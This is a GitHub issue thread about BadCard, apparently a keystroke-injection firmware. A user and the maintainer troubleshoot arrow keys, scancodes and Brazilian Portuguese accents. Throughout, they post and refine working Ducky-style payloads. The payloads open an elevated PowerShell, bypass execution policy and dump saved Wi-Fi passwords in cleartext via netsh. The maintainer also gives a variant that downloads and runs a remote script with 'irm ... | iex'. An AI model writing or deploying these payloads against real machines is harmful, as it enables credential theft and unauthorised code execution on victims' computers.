### ISSUE TITLE
LEFTARROW not working on long script

### ISSUE THREAD

**Issue by Herna4ndes** [VoidNoi/BadCard#10]
Hello, it's me again Well... now I'm having problems with the Left Arrow key and the TAB key. For example, this script to open Powershell as an administrator when running opens the window asking if I want to run it as an administrator, but when I press the left arrow or the TAB key it does not recognize it. could you help me please.

DELAY 1000
GUI r
DELAY 1000
STRING powershell 
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
STRING Set-ExecutionPolicy Bypass -Scope Process -Force; $profiles = netsh wlan show profiles ^| Select-String "Todos os perfis de usuário" ^| ForEach-Object {($_ -split \":\")[1].Trim()}; foreach ($profile in $profiles) {Write-Host "Perfil: $profile"; $keyContent = netsh wlan show profile name=\"$profile\" key=clear ^| Select-String "Conteúdo da chave"; if ($keyContent) {$password = ($keyContent -split \":\")[1].Trim(); Write-Host "Senha: $password"} else {Write-Host "Senha não encontrada ou não configurada."}; Write-Host ""} // Comando PowerShell para listar perfis e senhas
ENTER
![folhl4LQ](https://github.com/user-attachments/assets/32ab9514-35ab-4507-8653-6148bf3a38fa)

**Comment by Herna4ndes** [comment]
I tried with the following script too
DELAY 1000
GUI x
DELAY 500
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
LEFTARROW
DELAY 200
ENTER
DELAY 1000
STRING Set-ExecutionPolicy Bypass -Scope Process -Force; Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command "$profiles = netsh wlan show profiles ^| Select-String \"Todos os perfis de usuário\" ^| ForEach-Object {($_ -split \":\")[1].Trim()}; foreach ($profile in $profiles) {Write-Host \"Perfil: $profile\"; $keyContent = netsh wlan show profile name=\"$profile\" key=clear ^| Select-String \"Conteúdo da chave\"; if ($keyContent) {$password = ($keyContent -split \":\")[1].Trim(); Write-Host \"Senha: $password\"} else {Write-Host \"Senha não encontrada ou não configurada.\"}; Write-Host \"\"}"' -Verb RunAs
ENTER

**Comment by Herna4ndes** [comment]
I recorded it for you to see

https://youtube.com/shorts/pL4V89lvoPg

**Comment by Herna4ndes** [comment]
I also tried
000
GUI x
DELAY 1000
DOWNARROW
DELAY 1000
DOWNARROW
DELAY 1000
DOWNARROW
DELAY 1000
DOWNARROW
DELAY 1000
DOWNARROW
DELAY 1000
DOWNARROW
DELAY 1000
DOWNARROW
DELAY 1000
DOWNARROW
DELAY 1000
DOWNARROW
DELAY 1000
DOWNARROW
DELAY 1000
TAB
DELAY 1000
TAB
ENTER
DELAY 1000
STRING Set-ExecutionPolicy Bypass -Scope Process -Force; Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command "$profiles = netsh wlan show profiles ^| Select-String \"Todos os perfis de usuário\" ^| ForEach-Object {($_ -split \":\")[1].Trim()}; foreach ($profile in $profiles) {Write-Host \"Perfil: $profile\"; $keyContent = netsh wlan show profile name=\"$profile\" key=clear ^| Select-String \"Conteúdo da chave\"; if ($keyContent) {$password = ($keyContent -split \":\")[1].Trim(); Write-Host \"Senha: $password\"} else {Write-Host \"Senha não encontrada ou não configurada.\"}; Write-Host \"\"}"' -Verb RunAs
ENTER

**Comment by VoidNoi** [comment]
LEFTARROW does work, it just doesn't work on that specific script with so many DOWNARROWs for some reason. I'll see if I can figure out why it doesn't work on that script. Also just for your info the arrow keys are not part of the keyboard layouts they're the same for everyone and defined in the [keys.h](https://github.com/VoidNoi/BadCard/blob/main/keys.h) file.
You can achieve the same thing with this script:
```
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING Set-ExecutionPolicy Bypass -Scope Process -Force; Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command "$profiles = netsh wlan show profiles ^| Select-String "Todos os perfis de usuário" ^| ForEach-Object {($_ -split ":")[1].Trim()}; foreach ($profile in $profiles) {Write-Host "Perfil: $profile"; $keyContent = netsh wlan show profile name="$profile" key=clear ^| Select-String "Conteúdo da chave"; if ($keyContent) {$password = ($keyContent -split ":")[1].Trim(); Write-Host "Senha: $password"} else {Write-Host "Senha não encontrada ou não configurada."}; Write-Host ""}"' -Verb RunAs
DELAY 1000
ENTER
DELAY 1000
LEFTARROW
ENTER
```
or
```
GUI r
DELAY 500
STRING powershell
CTRL SHIFT ENTER
DELAY 500
LEFTARROW
ENTER
DELAY 1000
STRING Set-ExecutionPolicy Bypass -Scope Process -Force; Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command "$profiles = netsh wlan show profiles ^| Select-String "Todos os perfis de usuário" ^| ForEach-Object {($_ -split ":")[1].Trim()}; foreach ($profile in $profiles) {Write-Host "Perfil: $profile"; $keyContent = netsh wlan show profile name="$profile" key=clear ^| Select-String "Conteúdo da chave"; if ($keyContent) {$password = ($keyContent -split ":")[1].Trim(); Write-Host "Senha: $password"} else {Write-Host "Senha não encontrada ou não configurada."}; Write-Host ""}"'
DELAY 1000
ENTER
```
You can maybe even remove some of the DELAYs or shorten them

**Comment by Herna4ndes** [comment]
Again thank you very much.

**Comment by Herna4ndes** [comment]
Hello. I tested the script you gave me and I think I managed to find another error.
When running the code (netsh wlan show profiles) | Select-String "Todos os perfis de usuário" | ForEach-Object {
    $_.Line -match ":(.*)$"
    $profile = $matches[1].Trim()
    Write-Host "nProfile: $profile"
    $keyContent = (netsh wlan show profile name="$profile" key=clear) | Select-String "Conteúdo da chave"
    if ($keyContent) {
        $keyContent.Line -match ":(.*)$"
        $password = $matches[1].Trim()
        Write-Host "Senha: $password"
    } else {
        Write-Host "Senha não encontrada ou não configurada."
    }
}

BandCard is not interpreting or typing the "|"   and the "á" , "ã","é" keys
Here is the code executed on Badcard:

(netsh wlan show profiles)  Select-String "Todos os perfis de usurvio"  ForEach-Object {    $_.Line -match ":(.*)$"
     $profile = $matches[1].Trim()
     Write-Host "nProfile: $profile"
     $keyContent = (netsh wlan show profile name="$profile" key=clear)  Select-String "Conte]do da chave"
     if ($keyContent) {
         $keyContent.Line -match ":(.*)$"
         $password = $matches[1].Trim()
         Write-Host "Senha: $password"
     } else {
         Write-Host "Senha nxo encontrada ou nxo configurada."
     }
}

I will identify where the typing error is due to the lack of characters:

Todos os perfis de usurvio the correct one is Todos os perfis de usuário
Conte]do da chave the correct one is Conteúdo da chave
Senha nxo encontrada ou nxo configurada the correct is Senha não encontrada ou não configurada.
![powershell](https://github.com/user-attachments/assets/5a61c3f8-51f5-4f82-b7c8-f9895857f704)

**Comment by Herna4ndes** [comment]
I don't know if this topic can help you update your keyboard PT_br

https://www.tecmundo.com.br/teclado/38738-que-caracteres-voce-pode-fazer-segurando-a-tecla-alt-tabela-.htm 

Accented alphabet


Alt + 131 = â | Alt + 132 = ä | Alt + 133 = à | Alt + 134 = å | Alt + 142 = Ä
Alt + 143 = Å | Alt + 160 = á | Alt + 181 = Á | Alt + 182 = Â | Alt + 183 = À
Alt + 198 = ã | Alt + 199 = Ã | Alt + 130 = é | Alt + 136 = ê | Alt + 137 = ë
Alt + 138 = è | Alt + 144 = É | Alt + 210 = Ê | Alt + 211 = Ë | Alt + 212 = È
Alt + 139 = ï | Alt + 140 = î | Alt + 141 = ì | Alt + 161 = í | Alt + 214 = Í
Alt + 215 = Î | Alt + 216 = Ï | Alt + 222 = Ì | Alt + 147 = ô | Alt + 148 = ö
Alt + 149 = ò | Alt + 153 = Ö | Alt + 162 = ó | Alt + 226 = Ô | Alt + 224 = Ó
Alt + 227 = Ò | Alt + 228 = õ | Alt + 229 = Õ | Alt + 129 = ü | Alt + 150 = û
Alt + 151 = ù | Alt + 154 = Ü | Alt + 163 = ú | Alt + 233 = Ú | Alt + 234 = Û
Alt + 235 = Ù | Alt + 128 = Ç | Alt + 135 = ç | Alt + 164 = ñ | Alt + 165 = Ñ
Alt + 236 = ý | Alt + 237 = Ý

**Comment by VoidNoi** [comment]
The accented ones I can understand if they don't work but I can't get my head around why the "|" isn't. Man I'm gonna have nightmares with this layout

**Comment by VoidNoi** [comment]
I just tested and the "|" is printing correctly for me so I don't know why it's not working for you to be honest. The accents are indeed not working and the worst part is that I can't even promise you that I can get them working, but I'll try

**Comment by VoidNoi** [comment]
Yeah no the accents are not going to be possible. You can bypass this by making the powershell execute the command from a ps1 file instead of printing it with BadCard like I did with this:
```
GUI r
DELAY 500
STRING powershell
CTRL SHIFT ENTER
DELAY 500
LEFTARROW
ENTER
DELAY 500
STRING irm https://raw.githubusercontent.com/VoidNoi/test/refs/heads/main/test.ps1 | iex
ENTER
```
which would take the raw file from a github repository
or you can do it with a local file which can be less convenient
```
GUI r
DELAY 500
STRING powershell
CTRL SHIFT ENTER
DELAY 500
LEFTARROW
ENTER
DELAY 500
STRING C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe –ExecutionPolicy bypass –file ".\path\to\test.ps1"
ENTER
```

**Comment by Herna4ndes** [comment]
Okay. I'll test it later. Thank you very much for your attention. A big hug from Brazil.

**Comment by VoidNoi** [comment]
Happy to help :) While working on this I realized there where 2 more mismatched scancodes so make sure to update to 1.6.3

**Comment by Herna4ndes** [comment]
The new version 1.6.3 does not start. 
Download it via OTA, m5burner and via github and it doesn't work. It keeps installing and starting infinitely.

**Comment by VoidNoi** [comment]
Keep the G0 button pressed while connecting the cable to the cardputer
or
While connected press the G0 and reset button
And try flashing it again
It's flashing the firmware with no issue for me

**Comment by Herna4ndes** [comment]
I tried the way you said and it doesn't work either. :,(

**Comment by VoidNoi** [comment]
Do other firmwares work?

**Comment by Herna4ndes** [comment]
Yes, they work normally

**Comment by VoidNoi** [comment]
Ok let's do things right. I'm gonna close this issue. Create another one for this new issue so we're not talking off-topic and we'll try to fix this there.
